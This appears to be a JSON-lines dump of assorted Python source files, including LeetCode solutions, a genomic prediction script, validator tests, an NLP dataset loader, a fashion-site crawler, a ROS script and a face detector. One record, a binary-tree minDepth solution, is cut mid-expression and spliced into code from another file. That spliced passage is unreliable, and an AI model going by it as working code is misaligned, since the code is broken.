final_list_preparation(ch)\n\t\t\n\n","repo_name":"anoopvalluthadam/The_Elements_of_Computing_System","sub_path":"ST10/tokanizer.py","file_name":"tokanizer.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"25491995593","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Source: https://leetcode.com/problems/stickers-to-spell-word/\n# Author: Miao Zhang\n# Date: 2021-03-02\n\nclass Solution:\n def minStickers(self, stickers: List[str], target: str) -> int:\n cnt = collections.Counter(target)\n st = [collections.Counter(s) & cnt for s in stickers]\n for i in range(len(st) - 1, -1, -1):\n if any(st[i] & st[i] == st[j] for j in range(len(st)) if i != j):\n st.pop(i)\n stickers = [''.join(s.elements()) for s in st]\n print(stickers)\n\n dp = [-1] * (1 << len(target))\n dp[0] = 0\n for state in range(1 << len(target)):\n if dp[state] == -1: continue\n for sticker in stickers:\n now = state\n for s in sticker:\n for i, c in enumerate(target):\n if (now >> i) & 1: continue\n if c == s:\n now |= 1 << i\n break\n if dp[now] == -1 or dp[now] > dp[state] + 1:\n dp[now] = dp[state] + 1\n return dp[-1]\n","repo_name":"MichelleZ/leetcode","sub_path":"algorithms/python/stickerstoSpellWord/stickerstoSpellWord.py","file_name":"stickerstoSpellWord.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"18020603898","text":"##Trait prediction using different genomic similarity matrices\n\n#For testing different GSMs\nimport sys\n#import limix.vardec.vardec as va \nimport scipy.linalg as LA\nfrom sklearn.linear_model import Lasso\nimport numpy as np \nfrom sklearn.metrics import mean_squared_error\nimport math\nfrom sklearn.model_selection import KFold \nimport gc\nimport scipy as sp\nimport os\nimport csv\nimport time\nimport pandas as pd\nimport scipy.stats\n\n#load plantings names\nos.chdir(\"/home/student.unimelb.edu.au/andhikap/Clim_GWAS/Clim_GWAS_2\")\nplantings=np.load(\"Plantings_NEW.npy\")\n\nK=np.load(\"K_MATRIX_LIMIX.npy\") #or preferred GSM\n\n#load genetic data\nsnps=np.load('SNPs_0.1.npy') \n\n#load phenotype either DTB_NEW or SeedNum (SP)\ny=np.load(\"DTB_NEW.npy\")\n\n#load environmental data and get only min/max temperature\nos.chdir(\"/home/student.unimelb.edu.au/andhikap/Clim_GWAS/Microclim\")\nenv=pd.read_csv('Microclimate_minmaxDaily_threshold_0_0.csv',sep=',') \nlogical=env.columns.str.startswith(('PAR','TT','PTT','daylength') ) #remove predictors besides min/max temp.\nenv=env.iloc[:,~logical] \nenvironment=np.array(env)\n#combine to create fixed effect predictors\nX=np.concatenate((snps,environment),axis=1)\n\n\n\n#Running LMMLASSO\n#Defining model parameters\nalphas = 2.**(sp.linspace(-10,10,10)) #list of alphas to test\nn_splits=10\nN = X.shape[0]\nkf = KFold(n_splits,shuffle=True,random_state=None)\nn_alphas = len(alphas)\nMSE_train = sp.zeros((n_splits,n_alphas))\nMSE_test = sp.zeros((n_splits,n_alphas))\nW_nonzero = sp.zeros((n_splits,n_alphas))\nrsquared = sp.zeros((n_splits,n_alphas))\nkf.get_n_splits(X)\nos.chdir(\"/home/student.unimelb.edu.au/andhikap/Clim_GWAS/Clim_GWAS_2/Temp_Files\")\n\n#Model cross-validation to select alpha\n\nimport lmmlasso\nlasso = lmmlasso.LmmLasso(warm_start=True,fit_intercept=False,tol=0.5)\nMSE_train,MSE_test,W_nonzero, rsquared = lmmlasso.runCrossValidation(lasso,X,y,alphas,n_splits=10,K=K,verbose=True)\n\n\n# MSE_train_inter=sp.interpolate.UnivariateSpline(x=alphas, y=(MSE_train.mean(axis=0))).derivative(n=2)\n# MSE_test_inter=sp.interpolate.UnivariateSpline(x=alphas, y=(MSE_test.mean(axis=0))).derivative(n=2)\n# alphas_inter = 2.**(sp.linspace(-10,10,100))\n# idx_train = sp.argmin(MSE_train_inter(alphas_inter)) \n# idx_test = sp.argmin(MSE_test_inter(alphas_inter))\n# alpha_cv = (float(alphas_inter[idx_train])+float(alphas_inter[idx_test]))/2\n\n#selecting alpha (strength of penalization)\n\nidx_train=sp.argmin(MSE_train.mean(axis=0))\nidx_test =sp.argmin(MSE_test.mean(axis=0))\nalpha_cv = (float(alphas[idx_train])+float(alphas[idx_test]))/2\n\n\n#Model fitting with chosen alpha\n\nN = X.shape[0]\nkf = KFold(n_splits,shuffle=True,random_state=12)\n\n#Objects for storing results of 10-fold cross validation\nMSE_train_final = sp.zeros((n_splits,))\nMSE_test_final = sp.zeros((n_splits,))\nW_nonzero_final = sp.zeros((n_splits,))\nrsquared_final = sp.zeros((n_splits,)) \nkendall_final = sp.zeros((n_splits,))\n\nkf.get_n_splits(X)\nlasso.set_params(alpha=alpha_cv)\n\n#10-fold cross validation\nifold = 0 \nfor train_index,test_index in kf.split(X):\n print(('running fold %d'%ifold)) \n X_train, X_test, y_train, y_test= X[train_index], X[test_index], y[train_index], y[test_index]\n K_train = K[train_index][:,train_index]\n K_test = K[test_index][:,train_index]\n model_fit=lasso.fit(X_train,y_train,K=K_train) \n ytrain_star=model_fit.predict(X_train,K_train)\n ytest_star=model_fit.predict(X_test,K_test)\n 
MSE_train_final[ifold]=mean_squared_error(ytrain_star,y_train)\n    MSE_test_final[ifold]=mean_squared_error(ytest_star,y_test)\n    W_nonzero_final[ifold]=sp.sum(model_fit.coef_!=0)\n    slope, intercept, r_value, p_value, std_err = scipy.stats.linregress(y_test, ytest_star)\n    rsquared_final[ifold]=r_value**2\n    kendall_final[ifold]=sp.stats.kendalltau(y_test,ytest_star)[0]\n    ifold +=1\n\nfor train_index,test_index in kf.split(X):\n\tX_train, X_test, y_train, y_test, plantings_train, plantings_test= X[train_index], X[test_index], y[train_index], y[test_index], plantings[train_index], plantings[test_index] #Split into training and testing data sets\n\tK_train = K[train_index][:,train_index]\n\tK_test = K[test_index][:,train_index]\n\n#Fitting a final model for making figures\n\nlasso.set_params(alpha=alpha_cv)\nlasso = lasso.fit(X_train,y_train,K=K_train)\nweights = lasso.coef_\nY_hat = lasso.predict(X_test, K_test)\npd_Yhat=pd.DataFrame(Y_hat)\npd_Yhat.reset_index(drop=True,inplace=True)\npd_ytest=pd.DataFrame(y_test)\npd_plantings=pd.DataFrame(plantings_test)\nfor_plotting=pd.concat([pd_plantings,pd_ytest,pd_Yhat],axis=1)\nfor_plotting.columns=(\"Planting\",\"Y_test\",\"Y_hat\")\n\nHalleFall2006=for_plotting.loc[for_plotting['Planting']==\"HalleFall2006\"]\nNorwichSummer2006=for_plotting.loc[for_plotting['Planting']==\"NorwichSummer2006\"]\nNorwichSummer2007=for_plotting.loc[for_plotting['Planting']==\"NorwichSummer2007\"]\nNorwichSpring2007=for_plotting.loc[for_plotting['Planting']==\"NorwichSpring2007\"]\nNorwichFall2006=for_plotting.loc[for_plotting['Planting']==\"NorwichFall2006\"]\nOuluFall2007=for_plotting.loc[for_plotting['Planting']==\"OuluFall2007\"]\nValenciaFall2006=for_plotting.loc[for_plotting['Planting']==\"ValenciaFall2006\"]\n\n############### Plot for initial visualization of results ##################################\n# import matplotlib.pyplot as plt\n# os.chdir(\"/home/student.unimelb.edu.au/andhikap/Clim_GWAS/LMMLASSO/Figures_Corrected\")\n# matplotlib.use('agg')\n# plt.figure()\n\n\n# ranges=range(int(np.amax(y_test)))\n# plt.plot(ranges,ranges)\n# v=str(alpha_cv)\n\n# #plot_title=['LMMLASSO, w/SNPs, KNEWER_BIGK, Daily0_0'] #change title as needed \n# #plot_title=\"\".join(plot_title)\n# #plt.title(plot_title)\n# plt.xlabel('Observed DTB')\n# plt.ylabel('Predicted DTB')\n# plt.plot(HalleFall2006.iloc[:,1],HalleFall2006.iloc[:,2],color='#8f0000',marker='o',linestyle='None',label='HalleFall2006')\n# plt.plot(NorwichSummer2006.iloc[:,1],NorwichSummer2006.iloc[:,2],color='#c54259',marker='X',linestyle='None',label='NorwichSummer2006')\n# plt.plot(NorwichSummer2007.iloc[:,1],NorwichSummer2007.iloc[:,2],color='#e881ab',marker='p',linestyle='None',label='NorwichSummer2007')\n# plt.plot(NorwichSpring2007.iloc[:,1],NorwichSpring2007.iloc[:,2],color='#ffc2f3',marker='v',linestyle='None',label='NorwichSpring2007')\n# plt.plot(NorwichFall2006.iloc[:,1],NorwichFall2006.iloc[:,2],color='#d890e7',marker='d',linestyle='None',label='NorwichFall2006')\n# plt.plot(OuluFall2007.iloc[:,1],OuluFall2007.iloc[:,2],color='#9f66e1',marker='P',linestyle='None',label='OuluFall2007')\n# plt.plot(ValenciaFall2006.iloc[:,1],ValenciaFall2006.iloc[:,2],color='#3a47de',marker='*',linestyle='None',label='ValenciaFall2006')\n# #plt.figtext(0,2,rmse_string)\n# #plt.figtext(0,1.5,r2_string)\n# plt.legend(loc='upper left',frameon=True,fontsize='small')\n# plt.savefig('PredvsObs_KLIMIX_minmax.png')\n\n\n############################################################################\n\n#Record results\n\nos.chdir(\"/home/student.unimelb.edu.au/andhikap/Clim_GWAS/LMMLASSO/Summary_Results_Corrected\")\n\n\nalpha_cv_np=np.array(alpha_cv)\nc=np.array(sum(weights!=0))\nW_nonzero=np.array(c)\nrmse_test=math.sqrt(np.mean(MSE_test_final))\nr2_model=np.mean(rsquared_final)\nkendall_model=np.mean(kendall_final)\n\n\nresults=np.array((alpha_cv_np,W_nonzero,rmse_test,r2_model,kendall_model))\nresultspd=pd.DataFrame(results)\nresultspd=resultspd.T\nresultspd.columns=(\"alpha\",\"W_nonzero\",\"rmse_test\",\"R2\",\"kendalltau\")\nresultspd.to_csv(\"Results_KLIMIX_minmax.csv\")","repo_name":"andhikarp/AraCast","sub_path":"Scripts/LMMLASSO_testGSM.py","file_name":"LMMLASSO_testGSM.py","file_ext":"py","file_size_in_byte":7427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"35817837585","text":"import pytest\n\nfrom plenum.common.messages.fields import RequestIdentifierField\nfrom plenum.test.input_validation.constants import \\\n TEST_IDENTIFIER_SHORT, TEST_IDENTIFIER_LONG\n\nfrom plenum.test.input_validation.utils import b58_by_len\n\nvalidator = RequestIdentifierField()\n\n# Request id consists of client identifier (base56 string 16/32 long) and\n# some number (for now it is current timestamp, but can be any number)\nvalid_request_id = (TEST_IDENTIFIER_LONG, 11111)\n\n\ndef test_valid_request_id():\n for byte_len in range(1, 33):\n val = b58_by_len(byte_len)\n if byte_len in (16, 32):\n assert not validator.validate((val, 11111))\n else:\n assert validator.validate(val)\n\n\ndef test_invalid_order():\n s, t = valid_request_id\n assert validator.validate((t, s))\n\n\ndef test_empty_client_id():\n assert validator.validate((\"\", valid_request_id[1]))\n assert validator.validate((None, valid_request_id[1]))\n\n\ndef test_empty_number():\n assert validator.validate((valid_request_id[0], None))\n\n\ndef test_invalid_char():\n invalid_client_id = valid_request_id[0][:-1] + \"0\"\n invalid_request = (invalid_client_id, valid_request_id[1])\n assert validator.validate(invalid_request)\n\n\ndef test_invalid_length():\n invalid_client_id = valid_request_id[:-1]\n invalid_request = (invalid_client_id, valid_request_id[1])\n assert validator.validate(invalid_request)\n","repo_name":"hyperledger/indy-plenum","sub_path":"plenum/test/input_validation/fields_validation/test_request_identifier_field.py","file_name":"test_request_identifier_field.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":210,"dataset":"github-code","pt":"32"}
+{"seq_id":"9943209090","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def minDepth(self, root: Optional[TreeNode]) -> int:\n if not root:return 0 \n d ={root:1}\n Q=[root]\n mindepth = float(\"inf\")\n while Q:\n l = len(Q)\n for _ in range(l):\n node = Q.pop(0) \n if not(node.left or node.right) and d[node]= offset_start) and (char_start <= offset_end):\n token_start = token_index\n if (char_end-1 >= offset_start) and (char_end <= offset_end):\n token_end = token_index\n \n assert token_start is not None\n assert token_end is not None\n \n token_start += 4\n token_end += 4\n \n return (\n ids,\n attention_mask,\n token_type_ids,\n token_start,\n token_end,\n tweet,\n selected_text\n )\n\nclass TweetData(Dataset):\n def __init__(self, dataframe, tokenizer, max_len):\n self.dataframe = dataframe\n self.tokenizer = tokenizer\n self.max_len = max_len\n \n def __len__(self):\n return len(self.dataframe.index)\n\n def __getitem__(self, item):\n row = self.dataframe.loc[item]\n\n tweet = row.text\n selected_text = row.selected_text\n sentiment = row.sentiment\n textID = row.textID\n\n (\n ids,\n attention_mask,\n token_type_ids,\n token_start,\n token_end,\n tweet,\n selected_text\n ) = process_tweet(tweet, selected_text, sentiment, self.tokenizer, self.max_len)\n\n return {\n \"ids\": torch.tensor(ids, dtype=torch.long),\n \"attention_mask\": torch.tensor(attention_mask, dtype=torch.long),\n \"token_type_ids\": torch.tensor(token_type_ids, dtype=torch.long),\n \"token_start\": torch.tensor(token_start, dtype=torch.long),\n \"token_end\": torch.tensor(token_end, dtype=torch.long),\n \"tweet\": tweet,\n \"selected_text\": selected_text,\n \"sentiment\": sentiment,\n \"textID\": textID\n }\n\ndef kfold_indices(dataframe, n_splits=5):\n kfold = StratifiedKFold(n_splits=5, shuffle=True, random_state=2)\n splits = []\n for split in kfold.split(np.arange(dataframe.index.size), y=dataframe.sentiment):\n splits += [split]\n\n return splits\n\nif __name__ == \"__main__\":\n train, test, _ = read_data()\n\n tokenizer = initialize_tokenizer(Config.roberta_vocab, Config.roberta_merges)\n train_dataset = TweetData(train, tokenizer, Config.max_len)\n\n for batch in DataLoader(train_dataset, batch_size=100):\n print(batch[\"ids\"])\n print(batch[\"attention_mask\"])\n print(batch[\"token_type_ids\"])\n break","repo_name":"meetashok/kaggle","sub_path":"tweet-sentiment-extraction/roberta/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"69869013852","text":"# 참고 사이트\n# https://beomi.github.io/2017/07/05/HowToMakeWebCrawler-with-Multiprocess/\n\nfrom urllib import request\nimport requests\nimport csv\nimport ssl\nfrom bs4 import BeautifulSoup as bs\n# import selenium\n# from selenium import webdriver\n# from selenium.webdriver.common.keys import Keys\n# from selenium.webdriver.chrome.options import Options\n# from selenium.webdriver.support.ui import WebDriverWait\n# from selenium.webdriver.common.by import By\n# from selenium.webdriver.support import expected_conditions as EC\nimport time\nfrom multiprocessing import Pool\nfrom csv import writer\nimport random\nimport os\n\n# 크롤링에서 사용하는 변수들\nheaders = { 'user-agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36'}\nbaseUrl = \"https://goods.musinsa.com/api/goods/v1/review/style/list\";\npage = 1\n# 상품리뷰 없는거\n# goodsNo = 1911367\n# goodsNo = 2043036\ngoodsNo = 1576682\nlist_data = []\n\ndef writeCSV(list):\n list_title = ['codiId', 'codiStyle', 'codiTitle', 'codiContents', 'date', 'viewCnt', 'imgSrc', 'hashtags', 'clothes']\n if os.path.isfile(\"musinsa_codi.csv\"):\n pass\n else:\n with open('musinsa_codi.csv', 'w', newline='', encoding='utf-8-sig') as f_object:\n writer_object = writer(f_object)\n writer_object.writerow(list_title)\n f_object.close()\n\n with open('musinsa_codi.csv', 'a', newline='', encoding='utf-8-sig') as f_object:\n writer_object = writer(f_object)\n for data in list:\n writer_object.writerow(data)\n f_object.close()\n\n\ndef get_link():\n global headers\n codiStyle = ['americancasual', 'casual', 'chic', 'dandy', 'formal', 'girlish', 'golf', 'retro', 'romantic', 'sports', 'street']\n link = []\n for codi in codiStyle:\n pageNo = 1\n url = f'https://www.musinsa.com/app/codimap/lists?style_type={codi}&tag_no=&brand=&display_cnt=100&list_kind=big&sort=date&page={pageNo}'\n req = requests.get(url, headers=headers)\n html = req.text\n soup = bs(html, 'html.parser')\n if soup.find('span', class_=\"totalPagingNum\"):\n totalpageNo = soup.find('span', class_=\"totalPagingNum\").text\n totalpageNo = int(totalpageNo)\n while True:\n if pageNo == totalpageNo:\n link.append(url)\n break\n else:\n link.append(url)\n pageNo += 1\n url = f'https://www.musinsa.com/app/codimap/lists?style_type={codi}&tag_no=&brand=&display_cnt=100&list_kind=big&sort=date&page={pageNo}'\n else:\n break\n print('link끝')\n return link\n\ndef get_content(url):\n global headers\n time.sleep(random.uniform(2, 3))\n codiStyle = url.split('&')[0].split('?')[1][11:]\n total_data = []\n response = requests.get(url, headers=headers)\n html = response.text\n soup = bs(html, 'html.parser')\n totalUl = soup.find('ul', class_=\"style-list\")\n totalCodi = totalUl.find_all(\"li\", class_=\"style-list-item\")\n for codiSoup in totalCodi:\n try:\n data = []\n codiOnclick = codiSoup.find('a', class_=\"style-list-item__link\").attrs['onclick']\n codiId = ''\n for i in range(8, len(codiOnclick)):\n if codiOnclick[i].isnumeric():\n codiId += codiOnclick[i]\n else:\n break\n codiTitle = codiSoup.find('a', class_=\"style-list-item__link\").attrs['title']\n date = '20'+codiSoup.find_all('span', class_=\"post-information__text\")[0].text\n viewCnt = codiSoup.find_all('span', class_=\"post-information__text\")[1].text.split()[1]\n # imgSrc = codiSoup.find('img')['data-original']\n\n newUrl = f'https://www.musinsa.com/app/codimap/views/{codiId}'\n newReq = requests.get(newUrl, headers=headers)\n newhtml = newReq.text\n 
time.sleep(random.uniform(1, 2))\n newSoup = bs(newhtml, 'html.parser')\n hashtags = []\n if newSoup.select_one(\"#style_info > div.styling_tag > div\"):\n hashtag = newSoup.select_one(\"#style_info > div.styling_tag > div\").contents\n # print(hashtag)\n for i in range(1, len(hashtag)):\n if hashtag[i].text != '\\n':\n hashtags.append(hashtag[i].text[1:])\n else:\n hashtags = []\n imgSrc = newSoup.find('img',class_=\"photo\")['src']\n codiContents = newSoup.select_one(\"#style_info > div.styling_tag > p\").text\n # 하위 items \n clothesInfo = newSoup.find_all(\"div\", class_=\"swiper-slide\")\n clothes = []\n for cloth in clothesInfo:\n clothesBrand = cloth.find(\"a\", class_=\"brand\").text\n clothesName = cloth.find(\"a\", class_=\"brand_item\").text\n clothesImg = cloth.find(\"img\")['src']\n # if cloth.find\n clothesId = clothesImg.split('/')[6]\n clothesPrice = cloth.find(\"div\", class_=\"price\").contents[0].strip('\\n').strip('\\t')\n clothesPrice = clothesPrice.replace(\",\", \"\")\n clothes.append([clothesId, clothesBrand, clothesName, clothesImg, clothesPrice])\n data = [codiId, codiStyle, codiTitle, codiContents, date, viewCnt, imgSrc, hashtags, clothes]\n total_data.append(data)\n except:\n # html 못찾음\n pass\n writeCSV(total_data)\n\n\nif __name__=='__main__':\n start_time = time.time()\n pool = Pool(processes=16) # 8개의 프로세스를 사용합니다.\n pool.map(get_content, get_link()) # 2~3초 소요 500개 기준\n # speed_get_content(get_links()) # 단일 프로세스 12~14초 소요 500여개 기준\n print(\"--- %s seconds ---\" % (time.time() - start_time))","repo_name":"yoonjung1205/SSAFit","sub_path":"data/DataCrawling/정윤정/crawling_codi.py","file_name":"crawling_codi.py","file_ext":"py","file_size_in_byte":5967,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"2385589439","text":"#! /usr/bin/env python\nimport rospy\nfrom silbot3_msgs.msg import Device_Wheel_Msg\n\ndef move_wheel():\n publisher = rospy.Publisher('/DeviceNode/Wheel/commands', Device_Wheel_Msg, queue_size=10)\n wait_wheel_prepared(publisher)\n msg = Device_Wheel_Msg()\n msg.command = \"WHEEL_MOVE_TO_DELTA_X\"\n\n deltaX = -1000\n velocity = 50\n\n msg.iParams.append(deltaX)\n msg.dParams.append(velocity)\n publisher.publish(msg)\n\ndef wait_wheel_prepared(publisher) :\n r = rospy.Rate(10)\n subscriber_count = publisher.get_num_connections()\n while subscriber_count < 1 :\n subscriber_count = publisher.get_num_connections()\n rospy.loginfo(\"wating for subscriber\")\n r.sleep()\n\nif __name__ == \"__main__\" :\n rospy.init_node(\"wheel_move_delta_python\", anonymous=False)\n move_wheel()\n rospy.spin()\n","repo_name":"Robocare-lab/silbot3_tutorials","sub_path":"scripts/device/move_wheel_delta.py","file_name":"move_wheel_delta.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"42269953305","text":"matriz = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]\npar = 0\nfor a in range(0, 3):\n for c in range(0, 3):\n matriz[a][c] = int(input(f'Digite o valor [{a}], [{c}]: '))\nprint(f'[{matriz [0][0]:^5}] [{matriz[0][1]:^5}] [{matriz[0][2]:^5}]')\nprint(f'[{matriz [1][0]:^5}] [{matriz[1][1]:^5}] [{matriz[1][2]:^5}]')\nprint(f'[{matriz [2][0]:^5}] [{matriz[2][1]:^5}] [{matriz[2][2]:^5}]')\nfor c, v in enumerate(matriz[0]):\n if v % 2 == 0:\n par += v\nfor c, v in enumerate(matriz[1]):\n if v % 2 == 0:\n par += v\nfor c, v in enumerate(matriz[2]):\n if v % 2 == 0:\n par += v\nsoma = matriz[0][1] + matriz[1][1] + matriz[2][1]\nmaior = 0\nfor c, v in enumerate(matriz[1]):\n if v > maior:\n maior = v\nprint(f'A soma dos valores pares é: {par}')\nprint(f'A soma dos valores da segunda coluna é igual a: {soma}')\nprint(f'O maior valor encontrado na seguna linha é {maior}')\n\n","repo_name":"DevFerraz/Aulas-de-Python","sub_path":"Aulas/aula18.3.py","file_name":"aula18.3.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"35590637576","text":"from collections import defaultdict\nfrom time import time\nfrom datetime import datetime\nfrom glob import glob\nimport os\nimport re\n\n\ncurrent_order = defaultdict(int)\norder_filenames = []\nlist_called = False\nis_saved = True\ndiscard_enabled = False\nfinish_prompted = False\nis_finished = False\n\n\ndef pizza():\n full_command = input('Enter command>')\n command = full_command.split(' ')[0]\n COMMANDS = {'take': take, 'status': status, 'save': save,\n 'list': list_orders, 'load': load, 'finish': finish}\n if command in COMMANDS:\n COMMANDS[command](full_command)\n else:\n print('Unknown command!\\n'\n 'Try one of the following:\\n'\n 'take \\n'\n 'status\\n'\n 'save\\n'\n 'list\\n'\n 'load \\n'\n 'finish')\n global is_finished\n if not is_finished:\n pizza()\n\n\ndef take(command):\n command = command.split(' ')\n client_name = command[1]\n price = float(command[2])\n current_order[client_name] += price\n global is_saved\n is_saved = False\n print('Taking order from {0} for {1:.2f}'.format(client_name, price))\n global list_called\n list_called = False\n\n\ndef status(command):\n for client in current_order:\n print(client + ' - ' + str(current_order[client]))\n global list_called\n list_called = False\n\n\ndef save(command):\n ts = time()\n filename = 'orders_' + \\\n datetime.fromtimestamp(ts).strftime('%Y_%m_%d_%H_%M_%S')\n order_file = open(filename + '.txt', 'a')\n for client in current_order:\n order_file.write(client + ' - ' + str(current_order[client]) + '\\n')\n print('Saved the current order to ' + filename)\n order_file.close()\n global is_saved\n is_saved = True\n global list_called\n list_called = False\n\n\ndef list_orders(command):\n full_order_filenames = glob('*.txt')\n global order_filenames\n order_filenames = [\n os.path.splitext(filename)[0] for filename in full_order_filenames]\n for i, filename in enumerate(order_filenames):\n print('[' + str(i + 1) + '] - ' + filename)\n global list_called\n list_called = True\n\n\ndef load(command):\n global discard_enabled\n if not list_called:\n print('Use list command before loading.')\n return\n if not is_saved and not discard_enabled:\n print('You have not saved the current order.\\n'\n 'If you wish to discard it, type load again.')\n discard_enabled = True\n return\n command = command.split(' ')\n load_file_num = int(command[1])\n print('Loading ' + order_filenames[load_file_num - 1])\n load_file = open(order_filenames[load_file_num - 1] + '.txt', 'r')\n lines = load_file.readlines()\n global current_order\n current_order = defaultdict(int)\n for line in lines:\n client_order = re.findall('[\\w.]+', line)\n current_order[client_order[0]] = float(client_order[1])\n load_file.close()\n discard_enabled = False\n global list_called\n list_called = False\n\n\ndef finish(command):\n global finish_prompted\n if not is_saved and not finish_prompted:\n print('You have not saved your order.\\n'\n 'If you wish to continue, type finish again.\\n'\n 'If you want to save your order, type save')\n finish_prompted = True\n return\n print('Finishing order. Goodbye!')\n global is_finished\n is_finished = True\n global list_called\n list_called = False\n\n\ndef main():\n pizza()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"stoyaneft/HackBulgariaProgramming-101","sub_path":"week0/3.Python-file-system-problems/pizza.py","file_name":"pizza.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"15617890607","text":"import cv2\r\nimport numpy as np\r\nimport math\r\nimport argparse\r\nfrom PIL import Image\r\nfrom yolo import YOLOv8_face\r\n\r\nclass FaceDetector:\r\n def __init__(self, modelpath, confThreshold=0.45, nmsThreshold=0.5) -> None:\r\n self.model = YOLOv8_face(modelpath, conf_thres=confThreshold, iou_thres=nmsThreshold)\r\n\r\n def face_detect(self, imgpath):\r\n img = cv2.imread(imgpath)\r\n\r\n boxes, scores, classids, kpts = self.model.detect(img)\r\n\r\n pad = 10\r\n crops = []\r\n for bbox in boxes:\r\n x, y, w, h = bbox\r\n x, y, w, h = int(x), int(y), int(w), int(h)\r\n if x<0 or y<0 or w<=0 or h<=0 or x+w>img.shape[1] or y+h>img.shape[0]:\r\n print(\"problem\")\r\n continue\r\n \r\n new_x = x - pad\r\n if new_x<0:\r\n new_x = 0\r\n pad_x = x-new_x\r\n new_y = y - pad\r\n if new_y<0:\r\n new_y = 0\r\n pad_y = y-new_y\r\n new_w = w+pad_x+pad\r\n new_h = h+pad_y+pad\r\n if new_x+new_w>img.shape[1]:\r\n new_w = img.shape[1]-new_x\r\n if new_y+new_h>img.shape[0]:\r\n new_h = img.shape[0]-new_y\r\n \r\n crop = img[new_y:new_y + new_h, new_x:new_x + new_w]\r\n pil_image = Image.fromarray(crop)\r\n\r\n crops.append(pil_image)\r\n \r\n return crops","repo_name":"oavioz/GenerativeAI-Custom-Detection","sub_path":"src/face_recognition/face_detect.py","file_name":"face_detect.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"27798673111","text":"from collections import OrderedDict, namedtuple\nfrom typing import List\nimport logging\nimport os \n\nimport pandas as pd \nimport numpy as np\nnp.random.seed(896)\n\nfrom os.path import join, dirname, abspath\nimport sys\n\n# this monstrosity produces the module directory in an environment where this is unpacked\nsys.path.insert(0, abspath(join(dirname(abspath(__file__)), '..', '..')))\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom evidence_inference.preprocess.sentence_split import find_span_location, split_into_sentences, gen_exact_evid_array\nfrom evidence_inference.preprocess.article_reader import TableHTMLParser\nimport evidence_inference.preprocess.article_reader as article_reader\nlogging.basicConfig(level=logging.DEBUG, format='%(relativeCreated)6d %(threadName)s %(message)s')\nlogger = logging.getLogger(__name__)\nparser = TableHTMLParser()\n\n# this monstrosity points us to a root directory relative to this file\nannotation_root = os.path.abspath(os.path.join(__file__, \"..\", \"..\", \"..\", \"annotations\"))\nanno_csv_path = os.path.join(annotation_root, \"annotations_merged.csv\") # \"pilot_run_data/annotations.csv\"\nprompts_csv_path = os.path.join(annotation_root, \"prompts_merged.csv\") # \"pilot_run_data/prompts.csv\"\nbase_XML_path = os.path.join(annotation_root, \"xml_files\")\nbase_TXT_path = os.path.join(annotation_root, \"txt_files\")\nbase_ABS_path = os.path.join(annotation_root, \"abstracts\")\n_train_id_file, _validation_id_file, _test_id_file = [os.path.join(annotation_root, 'splits', d) for d in ['train_article_ids.txt', 'validation_article_ids.txt', 'test_article_ids.txt']]\n_ev1_train_id_file, _ev1_validation_id_file, _ev1_test_id_file = [os.path.join(annotation_root, 'splits', d) for d in ['ev1_train_article_ids.txt', 'ev1_validation_article_ids.txt', 'ev1_test_article_ids.txt']]\n_ev2_train_id_file, _ev2_validation_id_file, _ev2_test_id_file = [os.path.join(annotation_root, 'splits', d) for d in ['ev2_train_article_ids.txt', 'ev2_validation_article_ids.txt', 'ev2_test_article_ids.txt']]\nall_files = set([_train_id_file, _validation_id_file, _test_id_file, _ev1_train_id_file, _ev1_validation_id_file, _ev1_test_id_file, _ev2_train_id_file, _ev2_validation_id_file, _ev2_test_id_file])\n\nif not all(os.path.exists(x) for x in [anno_csv_path, prompts_csv_path, base_XML_path]):\n raise RuntimeError(\"One of {} does not exist\".format([anno_csv_path, prompts_csv_path, base_XML_path]))\n\n# base_XML_path = os.path.join(\"pilot_run_data\", \"xml_files\")\n\nPROMPT_ID_COL_NAME = \"PromptID\"\nLBL_COL_NAME = \"Label Code\"\nLABEL = 'Label'\nEVIDENCE_COL_NAME = \"Annotations\"\nEVIDENCE_START = \"Evidence Start\"\nEVIDENCE_END = \"Evidence End\"\nSTUDY_ID_COL = \"PMCID\"\nVALID_LABEL = \"Valid Label\"\nVALID_REASONING = \"Valid Reasoning\"\nUSE_PLAIN_TEXT = False\n\ndef get_article(article_id):\n xml_str = \"PMC{}.nxml\".format(article_id)\n xml_path = os.path.join(base_XML_path, xml_str)\n return article_reader.Article(xml_path, use_plain_text = USE_PLAIN_TEXT)\n\ndef read_in_articles(article_ids=None):\n\n anno_df = pd.read_csv(anno_csv_path)\n unique_article_ids = anno_df[STUDY_ID_COL].unique()\n\n articles = []\n\n for article_id in unique_article_ids:\n #import pdb; pdb.set_trace()\n\n if article_ids is None or article_id in article_ids:\n # 2376383\n articles.append(get_article(article_id))\n\n return articles\n\ndef get_text_article_(article_id, abstract=False):\n if abstract:\n name = 
